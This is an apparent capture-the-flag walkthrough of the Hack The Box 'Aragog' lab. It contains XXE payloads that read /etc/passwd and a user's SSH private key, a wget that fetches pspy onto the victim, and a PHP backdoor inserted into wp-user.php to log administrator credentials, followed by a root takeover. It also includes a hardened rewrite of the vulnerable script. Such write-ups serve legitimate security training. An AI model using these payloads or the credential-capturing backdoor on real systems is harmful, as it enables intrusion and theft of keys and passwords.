HTB – Aragog

Today we are going to solve another CTF challenge, “Aragog”. This VM is developed by Hack The Box; Aragog is a retired lab, and there are multiple ways to breach it.

Level: Medium

Task: Find the user.txt and root.txt in the vulnerable Lab.

Let’s Begin!!

As these labs are only available online, they have a static IP. The Aragog lab has IP 10.10.10.78.

Now, as always, let’s begin with port enumeration.

C:\Users\jacco>nmap -sC 10.10.10.78
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-29 18:27 W. Europe Standard Time
Nmap scan report for 10.10.10.78
Host is up (0.036s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
21/tcp open ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r--r--r-- 1 ftp ftp 86 Dec 21 2017 test.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.14.15
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 5
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh
| ssh-hostkey:
| 2048 ad:21:fb:50:16:d4:93:dc:b7:29:1f:4c:c2:61:16:48 (RSA)
| 256 2c:94:00:3c:57:2f:c2:49:77:24:aa:22:6a:43:7d:b1 (ECDSA)
|_ 256 9a:ff:8b:e4:0e:98:70:52:29:68:0e:cc:a0:7d:5c:1f (ED25519)
80/tcp open http
|_http-title: Apache2 Ubuntu Default Page: It works

So we connect over FTP with an anonymous login. Here I found a test.txt file in the current directory, and with the help of the get command we downloaded test.txt to our local machine.

C:\Users\jacco>ftp 10.10.10.78
Connected to 10.10.10.78.
220 (vsFTPd 3.0.3)
200 Always in UTF8 mode.
User (10.10.10.78:(none)): anonymous
230 Login successful.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
test.txt
226 Directory send OK.
ftp: 13 bytes received in 0.00Seconds 13.00Kbytes/sec.
ftp> get test.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for test.txt (86 bytes).
226 Transfer complete.
ftp: 86 bytes received in 0.00Seconds 86.00Kbytes/sec.
ftp>exit
221 Goodbye.
C:\Users\jacco>type test.txt
<details>
    <subnet_mask>255.255.255.192</subnet_mask>
    <test></test>
</details>

Then we opened the target IP in a web browser but didn’t find anything remarkable there.

Since we found nothing on port 80, we used dirbuster for a web directory brute-force attack.

Here I found a /hosts.php file in its results.

When I explored /hosts.php in the web browser I found the message “There are 4294967294 possible hosts for”, as shown in the image below. So I searched Google for 4294967294 hosts, which relates to the subnet mask 255.255.255.254, like the one found in the test.txt file above.

This means we can POST the test.txt file here with the help of Burp Suite.

So let’s capture the request and send the intercepted data to Repeater.

As we have seen, test.txt is in XML format, so we tried to test for XXE injection, first by reading the source of hosts.php itself through the php://filter wrapper.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM
"php://filter/convert.base64-encode/resource=/var/www/html/hosts.php" >]>
<details>
    <subnet_mask>&xxe;</subnet_mask>
    <test></test>
</details>

hosts.php (decoded from base64):

<?php
// libxml_disable_entity_loader(false) allows external entities to be loaded,
// and LIBXML_NOENT | LIBXML_DTDLOAD makes the parser substitute them: together
// these let a SYSTEM entity in the POST body resolve to a local file.
libxml_disable_entity_loader (false);
$xmlfile = file_get_contents('php://input');
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
$details = simplexml_import_dom($dom);
$mask = $details->subnet_mask;
//echo "\r\nYou have provided subnet $mask\r\n";

$max_bits = '32';
$cidr = mask2cidr($mask);
$bits = $max_bits - $cidr;
$hosts = pow(2,$bits);
// The expanded entity is echoed back unchanged here, which is how the
// file contents reach us in the response.
echo "\r\nThere are " . ($hosts - 2) . " possible hosts for $mask\r\n\r\n";

function mask2cidr($mask){
$long = ip2long($mask);
$base = ip2long('255.255.255.255');
return 32-log(($long ^ $base)+1,2);
}

?>

Luckily, we found that this is vulnerable to XXE injection: entity loading is explicitly re-enabled and the XML is parsed with LIBXML_NOENT, so whatever our entity points at is substituted into subnet_mask and printed back in the response.
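For comparison, a hardened counterpart of hosts.php, added here as an example that is not part of the original writeup or the lab: it keeps the same subnet calculation but parses without entity substitution or DTD loading, refuses any document that declares a DOCTYPE, and validates the mask before using it. The function names and the 64-bit PHP assumption are mine.

```php
<?php
// Hardened counterpart of hosts.php (added example, not the lab's code; 64-bit PHP assumed).
// The original called libxml_disable_entity_loader(false) and parsed with
// LIBXML_NOENT | LIBXML_DTDLOAD, so a SYSTEM entity in the POST body was expanded
// and the referenced file was echoed back in "possible hosts for $mask".
function parse_subnet_request(string $xml): ?string {
    // A request that only carries <details><subnet_mask> has no use for a DTD:
    // refuse anything that declares one, before it ever reaches the parser.
    if (stripos($xml, '<!DOCTYPE') !== false || stripos($xml, '<!ENTITY') !== false) {
        return null;
    }
    $previous = libxml_use_internal_errors(true);   // no warnings, just a false return
    $dom = new DOMDocument();
    // No LIBXML_NOENT, no LIBXML_DTDLOAD; LIBXML_NONET also blocks network fetches while parsing.
    $ok = $dom->loadXML($xml, LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($previous);
    if (!$ok || $dom->doctype !== null) {
        return null;
    }
    $nodes = $dom->getElementsByTagName('subnet_mask');
    if ($nodes->length !== 1) {
        return null;
    }
    $mask = trim($nodes->item(0)->textContent);
    // Only a dotted-quad IPv4 string is a candidate mask; this also removes the
    // echo of arbitrary input that the original printed on garbage values.
    return filter_var($mask, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) === false ? null : $mask;
}

function mask2cidr(string $mask): ?int {
    $hostbits = ip2long('255.255.255.255') ^ ip2long($mask); // e.g. 255.255.255.192 -> 63
    // A real mask inverts to 2^n - 1; anything else (e.g. 255.255.255.65) is rejected.
    if (($hostbits & ($hostbits + 1)) !== 0) {
        return null;
    }
    $n = 0;
    while ($hostbits > 0) { $hostbits >>= 1; $n++; }
    return 32 - $n;
}

$mask = parse_subnet_request((string) file_get_contents('php://input'));
$cidr = $mask === null ? null : mask2cidr($mask);
if ($cidr === null) {
    http_response_code(400);
    echo "Invalid subnet mask\r\n";
    exit;
}
echo "\r\nThere are " . (pow(2, 32 - $cidr) - 2) . " possible hosts for $mask\r\n\r\n";
```

With this version the original payloads are rejected with a 400 before parsing, and a valid body such as the test.txt above still yields 62 hosts for 255.255.255.192.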

Hence I can now simply exploit it to fetch a file from the server with the following XXE script and check its response.

Our payload:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:////etc/issue" >]>
<details>
    <subnet_mask>&xxe;</subnet_mask>
    <test></test>
</details>

Or with curl, here fetching /etc/passwd:

c:\PENTEST\HTB\aragog>type test.txt
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<details>
<subnet_mask>&xxe;</subnet_mask>
<test></test>
</details>
c:\PENTEST\HTB\aragog>curl -d @test.txt http://10.10.10.78/hosts.php

There are 4294967294 possible hosts for root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
--snip--
florian:x:1000:1000:florian,,,:/home/florian:/bin/bash
cliff:x:1001:1001::/home/cliff:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:123:130:ftp daemon,,,:/srv/ftp:/bin/false

Using the usernames from /etc/passwd, we try to fetch florian’s id_rsa through the same XXE.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:////home/florian/.ssh/id_rsa" >]>
<details>
    <subnet_mask>&xxe;</subnet_mask>
    <test></test>
</details>

Yuppiee! We got the SSH private key, which I copied into a text file and saved as the key file.

Then assign permission 600 to the saved key (id_rsa) and connect with SSH. You can see that we log in successfully and get a TTY shell on the victim machine; now let’s find user.txt.

PS C:\PENTEST\HTB\aragog> ssh -i .\floriankey.txt florian@10.10.10.78
Last login: Fri Jan 12 13:56:45 2018 from 10.10.14.3
florian@aragog:~$ ls
Desktop Documents Downloads Music Pictures Public Templates Videos examples.desktop user.txt
florian@aragog:~$ cat user.txt
f43*****359

Inside /var/www/html we saw /dev_wiki, and it was good to see that this folder holds a WordPress setup and its configuration files.

So I simply added the host IP 10.10.10.78 with the hostname aragog to our local hosts file in /etc.

So we browsed to aragog/dev_wiki in our web browser and got the WordPress home page.

Inside /blog we found a message to Florian from Cliff in which he mentions that the WordPress site is being restored every few minutes.

So with the help of Google I found the tool pspy32s, downloaded it onto the victim VM inside /tmp and gave it execute permission.

pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute.

cd /tmp
wget http://10.10.14.6/pspy32s
chmod +x pspy32s

After a while we realise that there is a cron job that periodically deletes the dev_wiki folder, replaces it with the backup folder, and that a script wp-login.py runs shortly after that.

Now let’s modify the wp-user.php file and place new PHP code inside it to capture the username and password.

Backdoor PHP code added to wp-user.php:

<?php
file_put_contents('/var/www/html/login.req', file_get_contents('php://input') . PHP_EOL, FILE_APPEND);
/**
* Fires in the login page header after scripts are enqueued.
*
* @since 2.1.0
*/
do_action ( 'login_form' );
?>

We ran some tests and saw that our backdoor works. After some time the cleartext login credentials for the administrator account appear in our log.

florian@aragog:/var/www/html$ cat login.req
pwd=%21KRgYs%28JFO%21%26MTr%29lf&wp-submit=Log+In&testcookie=1&log=Administrator&redirect_to=http%3A%2F%2F127.0.0.1%2Fdev_wiki%2Fwp-admin%2F

This password is URL-encoded; we decode it with Burp and then use it to switch to root.

florian@aragog:/var/www/html$ su root
Password:!KRgYs(JFO!&MTr)lf
root@aragog:/var/www/html# cat /root/root.txt
9a9*****de6

Author: Jacco Straathof
